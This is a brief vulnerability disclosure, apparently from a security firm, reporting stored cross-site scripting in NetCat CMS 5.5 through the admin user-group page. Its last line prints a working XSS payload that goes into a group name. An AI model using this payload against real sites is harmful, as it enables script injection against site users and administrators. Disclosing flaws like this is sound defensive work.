# Affected software: netcat cms
# Type of vulnerability: cross site scripting
# URL: netcat.ru
# Discovered by: Provensec
# Website: http://www.provensec.com
#version: 5.5
# Proof of concept


Adding a new group with xss payload will lead to xss

http://site/netcat/admin/#usergroup.list()

payload used "><img src=d onerror=confirm(1);>